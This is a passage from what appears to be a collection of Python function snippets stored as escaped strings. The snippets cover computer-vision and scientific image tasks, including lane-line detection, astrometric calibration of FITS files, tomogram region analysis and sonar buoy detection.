pub_magentaBall.publish(magenta_ball)\n\t print (\"Magenta ball detected.\\n\")\n\n\tcv2.imshow('window', image_np)\n\tcv2.waitKey(2)\n\tc = 0", "def vis_detections(im, class_name, dets, image_name, thresh=0.5):\n inds = np.where(dets[:, -1] >= thresh)[0]\n max_inds = 0\n max_score = 0.0\n if len(inds) == 0:\n # print('Warning: no target detected!')\n return\n elif len(inds) > 1:\n # print('Warning: ' + str(len(inds)) + ' targets detected! Choose the highest one')\n for i in inds:\n if(dets[i, -1] > max_score):\n max_inds = i\n max_score = dets[i, -1]\n\n# im = im[:, :, (2, 1, 0)]\n# fig, ax = plt.subplots(figsize=(12, 12))\n# ax.imshow(im, aspect='equal')\n # for i in inds:\n # bbox = dets[i, :4]\n # score = dets[i, -1]\n #print max_inds\n bbox = dets[max_inds, :4]\n score = dets[max_inds, -1]\n\n# ax.add_patch(\n# plt.Rectangle((bbox[0], bbox[1]),\n# bbox[2] - bbox[0],\n# bbox[3] - bbox[1], fill=False,\n# edgecolor='red', linewidth=3.5)\n# )\n# ax.text(bbox[0], bbox[1] - 2,\n# '{:s} {:.3f}'.format(class_name, score),\n# bbox=dict(facecolor='blue', alpha=0.5),\n# fontsize=14, color='white')\n\n # end for\n #print image_name, class_name\n #print score\n # file.writelines([image_name,'\\t',class_name,'\\t',str(score),'\\n'])\n # ax.set_title(('{} detections with '\n # 'p({} | box) >= {:.1f}').format(class_name, class_name,\n # thresh),fontsize=14)\n # plt.axis('off')\n # plt.tight_layout()\n # plt.draw()\n\t### SAVE IMAGES ? ###\n save_img_dir = os.path.join(cfg.ROOT_DIR, 'result', 'test_img')\n # if not os.path.exists(save_img_dir):\n # os.makedirs(save_img_dir)\n # plt.savefig(os.path.join(save_img_dir, image_name + '_' + class_name))\n\n boxes = {'boxes': ((bbox[0], bbox[1]), bbox[2] - bbox[0], bbox[3] - bbox[1])}\n \n save_mat_dir = os.path.join(cfg.ROOT_DIR, 'result', 'test_box')", "def main():\n print(\"Program version: 1.5\")\n StartTime = datetime.now()\n args = parseArguments()\n\n verbose = args.verbose\n images = args.images\n ignore_warnings = args.ignore_warnings\n if(args.silent):\n verbose = False\n images = False\n ignore_warnings = True\n\n if(args.images):\n plt.ioff()\n\n if(args.ignore_warnings):\n warnings.simplefilter('ignore', UserWarning)\n\n #sample header keywords\n # OBJECT = 'P016+03_P1_JKdeep' / Original target\n # RA = ' 01:06:37.759' / 01:06:37.7 RA (J2000) pointing\n # DEC = ' 03:32:36.096' / 03:32:36.0 DEC (J2000) pointing\n # EQUINOX = 2000. / Standard FK5 (years)\n # RADECSYS= 'FK5 ' / Coordinate reference frame\n # CRVAL1 = 16.65733 / 01:06:37.7, RA at ref pixel\n # CRVAL2 = 3.54336 / 03:32:36.0, DEC at ref pixel\n # CRPIX1 = 447. /Ref pixel in X\n # CRPIX2 = 452. / Ref pixel in Y\n # CDELT1 = -8.0000000000000E-5 / SS arcsec per pixel in RA\n # CDELT2 = 8.00000000000003E-5 / SS arcsec per pixel in DEC\n # CTYPE1 = 'RA---TAN' / pixel coordinate system\n # CTYPE2 = 'DEC--TAN' / pixel coordinate system\n # PC1_1 = 0.000000 / Translation matrix element\n # PC1_2 = 1.000000 / Translation matrix element\n # PC2_1 = -1.000000 / Translation matrix element\n # PC2_2 = 0.000000 / Translation matrix element\n\n fits_image_filenames = args.input\n\n #if directory given search for appropriate fits files\n\n if(os.path.isdir(fits_image_filenames[0])):\n print(\"detected a directory. Will search for fits files in it\")\n path = fits_image_filenames[0]\n fits_image_filenames = []\n for file in os.listdir(path):\n if file.endswith(\".fits\") and \"_astro\" not in file:\n fits_image_filenames.append(path+\"/\"+file)\n print(fits_image_filenames)\n\n multiple = False\n if(len(fits_image_filenames)>1):\n multiple = True\n not_converged = []\n converged_counter = 0\n for fits_image_filename in fits_image_filenames:\n\n result,_ = astrometry_script(fits_image_filename, catalog=args.catalog, rotation_scaling=0, xy_transformation=args.xy_transformation, fine_transformation=args.fine_transformation,\n images=images, vignette=args.vignette,vignette_rectangular=args.vignette_rectangular, cutouts=args.cutout, ra=args.ra, dec=args.dec, projection_ra=args.projection_ra, projection_dec=args.projection_dec, verbose=verbose, save_images=args.save_images, ignore_header_rot=args.ignore_header_rot, radius = args.radius, save_bad_result=args.save_bad_result, silent =args.silent, sigma_threshold_for_source_detection= args.sigma_threshold_for_source_detection, high_res=args.high_resolution, hdul_idx=args.hdul_idx, filename_for_sources=args.filename_for_sources, FWHM=args.seeing)\n\n if((not result) and args.rotation_scaling):\n print(\"Did not converge. Will try again with full rotation and scaling\")\n result, _ = astrometry_script(fits_image_filename, catalog=args.catalog, rotation_scaling=args.rotation_scaling, xy_transformation=args.xy_transformation, fine_transformation=args.fine_transformation,\n images=images, vignette=args.vignette,vignette_rectangular=args.vignette_rectangular, cutouts=args.cutout, ra=args.ra, dec=args.dec, projection_ra=args.projection_ra, projection_dec=args.projection_dec, verbose=verbose, save_images=args.save_images, ignore_header_rot=args.ignore_header_rot, radius = args.radius, save_bad_result=args.save_bad_result, silent=args.silent, sigma_threshold_for_source_detection=args.sigma_threshold_for_source_detection, high_res=args.high_resolution, hdul_idx=args.hdul_idx, filename_for_sources=args.filename_for_sources, FWHM=args.seeing)\n\n if(result):\n print(\"Astrometry was determined to be good.\")\n converged_counter = converged_counter+1\n else:\n print(\"Astrometry was determined to be bad.\")\n not_converged.append(fits_image_filename)\n if(args.save_bad_result):\n print(\"Result was saved anyway\")\n else:\n print(\"Result was not saved.\")\n # print(\"\")\n # print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n # print(\"> Astrometry for {} \".format(fits_image_filename))\n #\n # with fits.open(fits_image_filename) as hdul:\n # #print(hdul.info())\n # if(args.verbose):\n # print(\"if image is not at first position in the fits file the program will break later on\")\n # #print(hdul[0].header)\n #\n # hdu = hdul[0]\n # #hdu.verify('fix')\n # hdr = hdu.header\n #\n #\n # image_or = hdul[0].data.astype(float)\n # median = np.nanmedian(image_or)\n # image_or[np.isnan(image_or)]=median\n # image = image_or - median\n #\n # observation = find_sources(image, args.vignette)\n # #print(observation)\n #\n # positions = (observation['xcenter'], observation['ycenter'])\n # apertures = CircularAperture(positions, r=4.)\n #\n #\n # #world coordinates\n # print(\">Info found in the file -- (CRVAl: position of central pixel (CRPIX) on the sky)\")\n # print(WCS(hdr))\n #\n # hdr[\"NAXIS1\"] = image.shape[0]\n # hdr[\"NAXIS2\"] = image.shape[1]\n #\n # #wcsprm = Wcsprm(hdr.tostring().encode('utf-8')) #everything else gave me errors with python 3, seemed to make problems with pc conversios, so i wwitched to the form below\n # wcsprm = WCS(hdr).wcs\n # wcsprm_original = WCS(hdr).wcs\n # if(args.verbose):\n # print(WCS(wcsprm.to_header()))\n # wcsprm, fov_radius, INCREASE_FOV_FLAG, PIXSCALE_UNCLEAR = read_additional_info_from_header(wcsprm, hdr, args.ra, args.dec, args.projection_ra, args.projection_dec)\n # if(args.verbose):\n # print(WCS(wcsprm.to_header()))\n #\n # #print(wcsprm)\n # #wcsprm.pc = [[2, 0],[0,1]]\n #\n #\n # #Possibly usefull examples of how to use wcsprm:\n # #print(wcsprm.set())\n # #print(wcsprm.get_pc())\n # #pc = wcsprm.get_pc()\n # #print(np.linalg.det(pc))\n # #print(wcsprm.get_cdelt())\n # #wcs.fix()\n # #print(wcsprm.print_contents())\n # #print(repr(hdr.update(wcsprm.to_header().encode('utf-8')))) #not working\n #\n # #hdu.verify(\"fix\")\n # #print(repr(hdr))\n # #wcs.wcs_pix2world(pixcrd, 1)\n # #wcs.wcs_world2pix(world, 1)\n # #wcs.wcs.crpix = [-234.75, 8.3393]\n # # wcs.wcs.cdelt = np.array([-0.066667, 0.066667])\n # # wcs.wcs.crval = [0, -90]\n # # wcs.wcs.ctype = [\"RA---AIR\", \"DEC--AIR\"]\n # # wcs.wcs.set_pv([(2, 1, 45.0)])\n # # For historical compatibility, three alternate specifications of the linear transformations\n # # are available in wcslib. The canonical PCi_ja with CDELTia, CDi_ja, and the deprecated CROTAia\n # # keywords. Although the latter may not formally co-exist with PCi_ja,\n # # the approach here is simply to ignore them if given in conjunction with PCi_ja.\n # # has_pc, has_cd and has_crota can be used to determine which of these alternatives are present in the header.\n # # These alternate specifications of the linear transformation matrix are translated immediately to PCi_ja by set\n # # and are nowhere visible to the lower-level routines. In particular, set resets cdelt to unity if CDi_ja is present\n # # (and no PCi_ja). If no CROTAia is associated with the latitude axis, set reverts to a unity PCi_ja matrix.\n #\n #\n #\n #\n #\n # #get rough coordinates\n # #print(hdr[\"RA\"])\n # #coord = SkyCoord(hdr[\"RA\"], hdr[\"DEC\"], unit=(u.hourangle, u.deg), frame=\"icrs\")\n # coord = SkyCoord(wcsprm.crval[0], wcsprm.crval[1], unit=(u.deg, u.deg), frame=\"icrs\")\n # if(not PIXSCALE_UNCLEAR):\n # if(wcsprm.crpix[0] < 0 or wcsprm.crpix[1] < 0 or wcsprm.crpix[0] > image.shape[0] or wcsprm.crpix[1] > image.shape[1] ):\n # print(\"central value outside of the image, moving it to the center\")\n # coord_radec = wcsprm.p2s([[image.shape[0]/2, image.shape[1]/2]], 0)[\"world\"][0]\n # coord = SkyCoord(coord_radec[0], coord_radec[1], unit=(u.deg, u.deg), frame=\"icrs\")\n # #print(wcsprm)\n #\n #\n #\n # #better: put in nice wrapper! with repeated tries and maybe try synchron!\n # print(\">Dowloading catalog data\")\n # radius = u.Quantity(fov_radius, u.arcmin)#will prob need more\n # catalog_data = query.get_data(coord, radius, args.catalog)\n # #reference = reference.query(\"mag <20\")\n # max_sources = 500\n # if(INCREASE_FOV_FLAG):\n # max_sources= max_sources*2.25 #1.5 times the radius, so 2.25 the area\n # if(catalog_data.shape[0]>max_sources):\n # catalog_data = catalog_data.nsmallest(400, \"mag\")\n #\n # if(args.catalog == \"GAIA\" and catalog_data.shape[0] < 5):\n # print(\"GAIA seems to not have enough objects, will enhance with PS1\")\n # catalog_data2 = query.get_data(coord, radius, \"PS\")\n # catalog_data = pd.concat([catalog_data, catalog_data2])\n # #apertures_catalog = CircularAperture(wcs.wcs_world2pix(catalog_data[[\"ra\", \"dec\"]], 1), r=5.)\n # print(\"Now we have a total of {} sources. Keep in mind that there might be duplicates now since we combined 2 catalogs\".format(catalog_data.shape[0]))\n # elif(args.catalog == \"PS\" and (catalog_data is None or catalog_data.shape[0] < 5)):\n # print(\"We seem to be outside the PS footprint, enhance with GAIA data\")\n # catalog_data2 = query.get_data(coord, radius, \"GAIA\")\n # catalog_data = pd.concat([catalog_data, catalog_data2])\n # #apertures_catalog = CircularAperture(wcs.wcs_world2pix(catalog_data[[\"ra\", \"dec\"]], 1), r=5.)\n # print(\"Now we have a total of {} sources. Keep in mind that there might be duplicates now since we combined 2 catalogs\".format(catalog_data.shape[0]))\n #\n # #remove duplicates in catalog?\n #\n # apertures_catalog = CircularAperture(wcsprm.s2p(catalog_data[[\"ra\", \"dec\"]], 1)['pixcrd'], r=5.)\n #\n #\n # #plotting what we have, I keep it in the detector field, world coordinates are more painfull to plot\n # if(args.images):\n # fig = plt.figure()\n # fig.canvas.set_window_title('Input for {}'.format(fits_image_filename))\n # plt.xlabel(\"pixel x direction\")\n # plt.ylabel(\"pixel y direction\")\n # plt.title(\"Input - red: catalog sources, blue: detected sources in img\")\n # plt.imshow(image,cmap='Greys', origin='lower', norm=LogNorm())\n # apertures.plot(color='blue', lw=1.5, alpha=0.5)\n # apertures_catalog.plot(color='red', lw=1.5, alpha=0.5)\n #\n # plt.xlim(-200,image.shape[0]+200)\n # plt.ylim(-200,image.shape[1]+200)\n # if(args.save_images):\n # name_parts = fits_image_filename.rsplit('.', 1)\n # plt.savefig(name_parts[0]+\"_image_before.pdf\")\n #\n # ###tranforming to match the sources\n # print(\"---------------------------------\")\n # print(\">Finding the transformation\")\n # if(args.rotation_scaling):\n # print(\"Finding scaling and rotation\")\n # wcsprm = register.get_scaling_and_rotation(observation, catalog_data, wcsprm, scale_guessed=PIXSCALE_UNCLEAR, verbose=args.verbose)\n # if(args.xy_transformation):\n # print(\"Finding offset\")\n # wcsprm,_,_ = register.offset_with_orientation(observation, catalog_data, wcsprm, fast=False , INCREASE_FOV_FLAG=INCREASE_FOV_FLAG, verbose= args.verbose)\n #\n # #correct subpixel error\n # obs_x, obs_y, cat_x, cat_y, distances = register.find_matches(observation, catalog_data, wcsprm, threshold=3)\n # rms = np.sqrt(np.mean(np.square(distances)))\n # best_score = len(obs_x)/(rms+10) #start with current best score\n # fine_transformation = False\n # if(args.fine_transformation):\n # for i in [2,3,5,8,10,6,4, 20,2,1,0.5]:\n # wcsprm_new, score = register.fine_transformation(observation, catalog_data, wcsprm, threshold=i)\n # if(score> best_score):\n # wcsprm = wcsprm_new\n # best_score = score\n # fine_transformation = True\n # if not fine_transformation:\n # print(\"Fine transformation did not improve result so will be discarded.\")\n # else:\n # print(\"Fine transformation applied to improve result\")\n # #register.calculate_rms(observation, catalog_data,wcs)\n #\n # #make wcsprim more physical by moving scaling to cdelt, out of the pc matrix\n # wcs =WCS(wcsprm.to_header())\n # if(args.verbose):\n # print(wcs)\n #\n # from astropy.wcs import utils\n # scales = utils.proj_plane_pixel_scales(wcs)\n # print(scales)\n # cdelt = wcsprm.get_cdelt()\n # print(cdelt)\n # scale_ratio = scales/cdelt\n # #print(scale_ratio)\n # pc = np.array(wcsprm.get_pc())\n # pc[0,0] = pc[0,0]/scale_ratio[0]\n # pc[1,0] = pc[1,0]/scale_ratio[1]\n # pc[0,1] = pc[0,1]/scale_ratio[0]\n # pc[1,1] = pc[1,1]/scale_ratio[1]\n # wcsprm.pc = pc\n # wcsprm.cdelt = scales\n # if(args.verbose):\n # print(\"moved scaling info to CDelt\")\n # print(WCS(wcsprm.to_header()))\n #\n # #WCS difference before and after\n # print(\"> Compared to the input the Wcs was changed by: \")\n # scales_original = utils.proj_plane_pixel_scales(WCS(hdr))\n # print(\"WCS got scaled by {} in x direction and {} in y direction\".format(scales[0]/scales_original[0], scales[1]/scales_original[1]))\n # #sources:\n # #https://math.stackexchange.com/questions/2113634/comparing-two-rotation-matrices\n # #https://stackoverflow.com/questions/2827393/angles-between-two-n-dimensional-vectors-in-python/13849249#13849249\n # def unit_vector(vector):\n # \"\"\" Returns the unit vector of the vector. \"\"\"\n # return vector / max(np.linalg.norm(vector), 1e-10)\n # def matrix_angle( B, A ):\n # \"\"\" comment cos between vectors or matrices \"\"\"\n # Aflat = A.reshape(-1)\n # Aflat = unit_vector(Aflat)\n # Bflat = B.reshape(-1)\n # Bflat = unit_vector(Bflat)\n # #return np.arccos((np.dot( Aflat, Bflat ) / max( np.linalg.norm(Aflat) * np.linalg.norm(Bflat), 1e-10 )))\n # return np.arccos(np.clip(np.dot(Aflat, Bflat), -1.0, 1.0))\n # #print(matrix_angle(wcsprm.get_pc(), wcsprm_original.get_pc()) /2/np.pi*360)\n # rotation_angle = matrix_angle(wcsprm.get_pc(), wcsprm_original.get_pc()) /2/np.pi*360\n # if((wcsprm.get_pc() @ wcsprm_original.get_pc() )[0,1] > 0):\n # text = \"counterclockwise\"\n # else:\n # text = \"clockwise\"\n # print(\"Rotation of WCS by an angle of {} deg \".format(rotation_angle)+text)\n # old_central_pixel = wcsprm_original.s2p([wcsprm.crval], 0)[\"pixcrd\"][0]\n # print(\"x offset: {} px, y offset: {} px \".format(wcsprm.crpix[0]- old_central_pixel[0], wcsprm.crpix[1]- old_central_pixel[1]))\n #\n #\n # #check final figure\n # if(args.images):\n # fig = plt.figure()\n # fig.canvas.set_window_title('Result for {}'.format(fits_image_filename))\n # plt.xlabel(\"pixel x direction\")\n # plt.ylabel(\"pixel y direction\")\n # plt.title(\"Result - red: catalog sources, blue: detected sources in img\")\n # plt.imshow(image,cmap='Greys', origin='lower', norm=LogNorm())\n # apertures.plot(color='blue', lw=1.5, alpha=0.5)\n # #apertures_catalog = CircularAperture(wcs.wcs_world2pix(catalog_data[[\"ra\", \"dec\"]], 1), r=5.)\n # apertures_catalog = CircularAperture(wcsprm.s2p(catalog_data[[\"ra\", \"dec\"]], 1)['pixcrd'], r=5.)\n #\n # apertures_catalog.plot(color='red', lw=1.5, alpha=0.5)\n # if(args.save_images):\n # name_parts = fits_image_filename.rsplit('.', 1)\n # plt.savefig(name_parts[0]+\"_image_after.pdf\")\n #\n # print(\"--- Evaluate how good the transformation is ----\")\n # register.calculate_rms(observation, catalog_data,wcsprm)\n #\n #\n # #updating file\n # write_wcs_to_hdr(fits_image_filename, wcsprm)\n #\n #\n # print(\"overall time taken\")\n # print(datetime.now()-StartTime)\n # if(args.images):\n # plt.show()\n if(multiple):\n print(\">> Final report:\")\n print(\"Processed {} files, {} of them did converge. The following files failed:\".format(len(fits_image_filenames), converged_counter))\n print(not_converged)\n print(\"-- finished --\")", "def _red_detect_(self, nslice = 0, thresh = 2.0):\n zk_1 = 's_' + format(nslice, '03d')\n zk_2 = 's_' + format(nslice+1, '03d')\n\n zf_1 = self.z_dense[zk_1]\n zf_2 = self.z_dense[zk_2]\n\n # extract the y and x coordinates\n y1 = zf_1[:,0]\n x1 = zf_1[:,1]\n\n y2 = zf_2[:,0]\n x2 = zf_2[:,1]\n\n\n # create a meshgrid\n [YC, YR] = np.meshgrid(y2, y1)\n [XC, XR] = np.meshgrid(x2, x1)\n\n\n dist_block = np.sqrt((YC-YR)**2 + (XC-XR)**2)\n red_pair = np.where(dist_block <= thresh) # find out where the distance between cell i in plane k and cell j in plane k+1 is below the threshold.\n\n ind1 = red_pair[0] # the indices in the first frame\n ind2 = red_pair[1] # the indices in the second frame\n\n\n # select those with markers > 0 and markers < 0\n marker_1 = zf_1[ind1, 3]\n\n\n new_idx = (marker_1 == 0) # select those with zero-markers, which are never counted before. These are new cells. marker_1 needs to be updated.\n pool_new = ind1[new_idx] # select the indices in the first frame where new redundancies are detected \n pool_new_cov = ind2[new_idx] # select the indices in the second frame where new redundancies are detected.\n\n\n pool_exist = ind1[~new_idx] # among the detected redundancies, find those already marked.\n pool_exist_cov = ind2[~new_idx] # correspondingly, find those already marked in the adjacent slice\n\n n_new = len(pool_new)\n n_exist = len(pool_exist)\n if self.verbose:\n print(n_new, \"new redundancies, \", n_exist, \"existing redundancies\")\n\n for n_count in np.arange(n_new):\n # build the new keys\n # also, we need to assign each new key an identity number which is unique.\n n_ind1 = pool_new[n_count] # find the indices in the first slice that contains new redundancies\n n_ind2 = pool_new_cov[n_count] # find the indices in the following slice \n pr_number = nslice * 1000 + n_ind1\n pr_key = 'sl_' + str(pr_number) # build a key \n new_sl = Simple_list(nslice) # create a simple list with z_marker = nslice, nslice is the index of the first z-slice \n new_sl.add([nslice, zf_1[n_ind1, 4]])\n new_sl.add([nslice+1, zf_2[n_ind2, 4]])\n zf_1[n_ind1, 3] = pr_number # assign the new pr_number to zf_1\n zf_2[n_ind2, 3] = pr_number # assigne the same new pr_number to zf_2\n\n self.redundancy_pool[pr_key] = new_sl # stored into the redundancy pool\n\n\n for n_count in np.arange(n_exist):\n # search for the existing keys\n n_ind1 = pool_exist[n_count]\n n_ind2 = pool_exist_cov[n_count]\n pr_number = int(zf_1[n_ind1, 3])# catch up the pr_number\n pr_key = 'sl_' + str(pr_number) # this pr_key should already exist in the pool. \n\n self.redundancy_pool[pr_key].add([nslice+1, zf_2[n_ind2, 4]])\n zf_2[n_ind2, 3] = pr_number # update the pr_number in the adjacent slice", "def process_image(image):\n \n # (step 1) get gray image\n gray = grayscale(image)\n \n # (step 2) do gaussian blur with kernel size is 3\n blur_gray = gaussian_blur(gray, 3)\n \n # (step 3) do canny edge detction with low 50 and hight 150\n canny_edges = canny(blur_gray, 50, 150)\n \n # (step 4) region of interset\n imshape = image.shape\n left_bottom = (50,imshape[0])\n right_bottom = (imshape[1]-50,imshape[0])\n left_top = (420, 330)\n right_top = (imshape[1]-420, 330)\n # used later to discard lines which are out of the ROI\n polygon = Polygon([(50,imshape[0]+1),(imshape[1]-50,imshape[0]+1), (imshape[1]-420, 329), (420, 329)])\n vertices = np.array([[left_bottom,left_top, right_top, right_bottom]], dtype=np.int32)\n masked_edge = region_of_interest(canny_edges, vertices)\n \n # (step 5) get lane lines from hough transform\n rho = 2\n theta = np.pi/18 \n threshold = 15\n min_line_length = 10\n max_line_gap = 20\n lines = hough_lines(masked_edge, rho, theta, threshold, min_line_length, max_line_gap)\n \n # (step 6) seperate left and right lines\n left_lines = []\n right_lines = []\n for line in lines:\n for x1,y1,x2,y2 in line:\n if y1 > y2:\n temp_line = [x1,y1,x2,y2]\n if x2 != x1:\n m = (float(y2) - float(y1)) / (float(x2) - float(x1))\n else:\n m = 1000 # it will be dicarded, any high value will work\n temp_line.append(m)\n if x1 < x2:\n left_lines.append(temp_line)\n else:\n right_lines.append(temp_line)\n else:\n temp_line = [x2,y2,x1,y1]\n if x2 != x1:\n m = (float(y1) - float(y2)) / (float(x1) - float(x2))\n else:\n m = 1000\n temp_line.append(m)\n if x1 > x2:\n left_lines.append(temp_line)\n else:\n right_lines.append(temp_line)\n \n # (step 7) get left and right lines slopes, can be done with step 6 although\n left_slop = []\n for left_line in left_lines:\n x1 = left_line[0]; y1 = left_line[1]; x2 = left_line[2]; y2 = left_line[3]; \n if x1 != x2:\n left_slop.append( (float(y2) - float(y1)) / (float(x2) - float(x1)) )\n average_left_slop = sum(left_slop)/len(left_slop) # not used yet\n \n right_slop = []\n for right_line in right_lines:\n x1 = right_line[0]; y1 = right_line[1]; x2 = right_line[2]; y2 = right_line[3]; \n if x1 != x2:\n right_slop.append( (float(y2) - float(y1)) / (float(x2) - float(x1)) )\n average_right_slope = sum(right_slop)/len(right_slop) # not used yet\n \n \n # (step 8) delete left lines which deviate from thersold_s slope\n thersold_s = 0.4\n delet_left_index = []\n i = 0\n for left_line in left_lines:\n x1 = left_line[0]; y1 = left_line[1]; x2 = left_line[2]; y2 = left_line[3]; m = left_line[4]; \n if abs(m) < thersold_s:\n delet_left_index.append(i)\n i=i+1\n for i in range((len(delet_left_index)-1), -1, -1):\n del left_lines[delet_left_index[i]]\n \n # (step 9) delete right lines which deviate from average slope\n delet_index_right = []\n i = 0\n for right_line in right_lines:\n x1 = right_line[0]; y1 = right_line[1]; x2 = right_line[2]; y2 = right_line[3]; m = right_line[4]; \n if abs(m) < thersold_s:\n delet_index_right.append(i)\n i=i+1\n for i in range((len(delet_index_right)-1), -1, -1):\n del right_lines[delet_index_right[i]]\n \n # (step 10) extrapolate left and right lines\n left_line_draw = True\n x_lefts = []\n y_lefts = []\n for line in left_lines:\n x1, y1, x2, y2, m = line\n x_lefts.append(x1)\n x_lefts.append(x2) \n y_lefts.append(y1)\n y_lefts.append(y2)\n \n if len(x_lefts) > 0:\n slope_left, c_left = np.polyfit(x_lefts, y_lefts, 1)\n else:\n slope_left, c_left = 1, 1\n left_line_draw = False\n \n right_line_draw = True\n x_rights = []\n y_rights = []\n for line in right_lines:\n x1, y1, x2, y2, m = line\n x_rights.append(x1)\n x_rights.append(x2)\n y_rights.append(y1)\n y_rights.append(y2)\n if len(x_rights) > 0:\n slope_right, c_right = np.polyfit(x_rights, y_rights, 1)\n else:\n slope_right, c_right = 1, 1\n right_line_draw = False\n \n y1_left = 530 # again hardcoded values, from ROI\n y2_left = 330 # again hardcoded values, from ROI\n x1_left = int((y1_left - c_left) / slope_left)\n x2_left = int((y2_left - c_left) / slope_left)\n \n y1_right = 530 # again hardcoded values, from ROI\n y2_right = 330 # again hardcoded values, from ROI \n x1_right = int((y1_right - c_right) / slope_right)\n x2_right = int((y2_right - c_right) / slope_right)\n \n # (step 11) check if left/right line is out of ROI\n left_point1 = Point(x1_left, y1_left)\n left_point2 = Point(x2_left, y2_left)\n \n right_point1 = Point(x1_right, y1_right)\n right_point2 = Point(x2_right, y2_right)\n \n if polygon.contains(left_point1) and polygon.contains(left_point2):\n left_line_draw = True\n else:\n #print (\"left line out\", left_point1, left_point2)\n left_line_draw = False\n \n if polygon.contains(right_point1) and polygon.contains(right_point2):\n right_line_draw = True\n else:\n #print (\"right line out\", right_point1, right_point2)\n right_line_draw = False\n \n \n # (step 12) draw lines\n line_image = np.copy(image)\n # Draw the right and left lines on image\n if left_line_draw:\n cv2.line(line_image, (x1_left, y1_left), (x2_left, y2_left), (255,0,0),5)\n if right_line_draw:\n cv2.line(line_image, (x1_right, y1_right), (x2_right, y2_right), (255,0,0),5)\n \n # Create a \"color\" binary image to combine with line image\n color_edges = np.dstack((masked_edge, masked_edge, masked_edge)) \n \n # Draw the lines on the edge image\n lines_edges = cv2.addWeighted(color_edges, 0.4, line_image, 1, 0) \n #plt.imshow(lines_edges)\n #plt.show()\n return lines_edges", "def global_analysis(tomo, b_th, c=18):\n\n ## Thesholding and Volume analysis\n if c == 6:\n con_mat = [ [[0, 0, 0], [0, 1, 0], [0, 0, 0]],\n [[0, 1, 0], [1, 1, 1], [0, 1, 0]],\n [[0, 0, 0], [0, 1, 0], [0, 0, 0]] ]\n elif c == 18:\n con_mat = [[[0, 1, 0], [1, 1, 1], [0, 1, 0]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[0, 1, 0], [1, 1, 1], [0, 1, 0]]]\n elif c == 26:\n con_mat = [[[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]]]\n else:\n raise ValueError\n tomo_lbl, num_lbls = sp.ndimage.label(tomo >= b_th, structure=np.ones(shape=[3, 3, 3]))\n tomo_out = np.zeros(shape=tomo.shape, dtype=int)\n lut = np.zeros(shape=num_lbls+1, dtype=int)\n\n ## COUNTING REGIONS METHODS\n # import time\n # hold_t = time.time()\n # for lbl in range(1, num_lbls + 1):\n # ids = tomo == lbl\n # feat_sz = len(ids)\n # tomo_out[ids] = feat_sz\n # # print('[1]:', lbl, 'of', num_lbls)\n # print time.time() - hold_t\n\n ## COUNTING PIXELS METHOD\n ## Count loop\n # cont, total = 0, np.prod(tomo.shape)\n # import time\n # hold_t = time.time()\n for x in range(tomo.shape[0]):\n for y in range(tomo.shape[1]):\n for z in range(tomo.shape[2]):\n id = tomo_lbl[x, y, z]\n lut[id] += 1\n # cont += 1\n # print('[1]:', cont, 'of', total)\n #\n ## Write loop\n # cont, total = 0, np.prod(tomo.shape)\n\n for x in range(tomo.shape[0]):\n for y in range(tomo.shape[1]):\n for z in range(tomo.shape[2]):\n id = tomo_lbl[x, y, z]\n if id > 0:\n tomo_out[x, y, z] = lut[id]\n # cont += 1\n # print('[1]:', cont, 'of', total)\n # print time.time() - hold_t\n\n return tomo_out", "def get_dark_images(new_path, dataframe):\n\n image_list = [i for i in dataframe['image']]\n return [1 if np.mean(np.array(Image.open(new_path + image))) == 0 else 0 for image in image_list]", "def detect_labels(img: np.ndarray):\n \n # Create a range of allowed colors.\n lower_color = np.array([20, 50, 0])\n upper_color = np.array([255, 255, 255])\n\n # Keep the pixels that lie within the range.\n color_filtered = cv.inRange(\n cv.cvtColor(img, cv.COLOR_RGB2HSV),\n lower_color,\n upper_color\n )\n \n # Keeping only the really bright pixels (converted to 255), change the dull ones to 0.\n # Helps distinguish the labels from other dull colors.\n _, thresholded = cv.threshold(color_filtered, 254, 255, cv.THRESH_BINARY)\n\n # Reduce the thickness of regions. Every 30x30 sliding window of 255 in the image gets replaced by a white pixel.\n # The stronger the erosion, the more the noise is removed, with a chance of removal of good pixels as well.\n eroded = cv.erode(thresholded, np.ones((30, 30)))\n\n # Now find outlines of the bright regions that remain after the thickness reduction.\n contours, _ = cv.findContours(eroded, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n \n # Identify the contours that represent our labels.\n # Gotta be the two largest ones in terms of area.\n contour_areas = [(cv.contourArea(c), idx) for (idx, c) in enumerate(contours)]\n\n contour_largest_idx = max(contour_areas)[1]\n contour_second_largest_idx = max(filter(lambda item: item[1] != contour_largest_idx, contour_areas))[1]\n\n # Since the labels are sorta rectangular, find the mean of the contours' y-axes to approximate the vertical center of the labels.\n largest_vertical_center = np.mean(contours[contour_largest_idx][:, :, 1])\n second_largest_vertical_center = np.mean(contours[contour_second_largest_idx][:, :, 1])\n\n # Higher center implies the value is more towards the bottom of the image, and hence the vertical center of the bottom label.\n bottom_label = min(largest_vertical_center, second_largest_vertical_center)\n \n # Lower center implies the value is more towards the top of the image, and hence the vertical center of the top label.\n top_label = max(largest_vertical_center, second_largest_vertical_center)\n\n return bottom_label, top_label", "def find_buoy(img, display_results=False):\n\n greyscale_image = cv2.cvtColor(img.astype(np.uint8), cv2.COLOR_GRAY2BGR)\n cm_image = cv2.applyColorMap(greyscale_image, cv2.COLORMAP_VIRIDIS)\n\n cm_copy_image = cm_image\n cv2.copyTo(cm_image, cm_copy_image)\n cm_image = cv2.medianBlur(cm_image, 5) # Removes salt and pepper noise\n\n mask = mask_sonar_image(cm_image, display_results)\n\n cm_circs = cv2.findContours(mask, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)[-2]\n cm_circs = list(filter(lambda x: (cv2.contourArea(x) > 250), cm_circs))\n\n cm_circs = sorted(cm_circs, key=lambda x: (cv2.arcLength(x, True)**2/(\n 4*math.pi*cv2.contourArea(x))), reverse=False)\n\n filtered_circles = cm_circs[0:1]\n\n circle_positions = []\n for circle in filtered_circles: # Find center of circle code\n M = cv2.moments(circle)\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n circle_positions.append((cX, cY, (cv2.arcLength(circle, True)**2/(\n 4*math.pi*cv2.contourArea(circle))),\n cv2.contourArea(circle)))\n\n if display_results:\n cv2.drawContours(cm_copy_image, 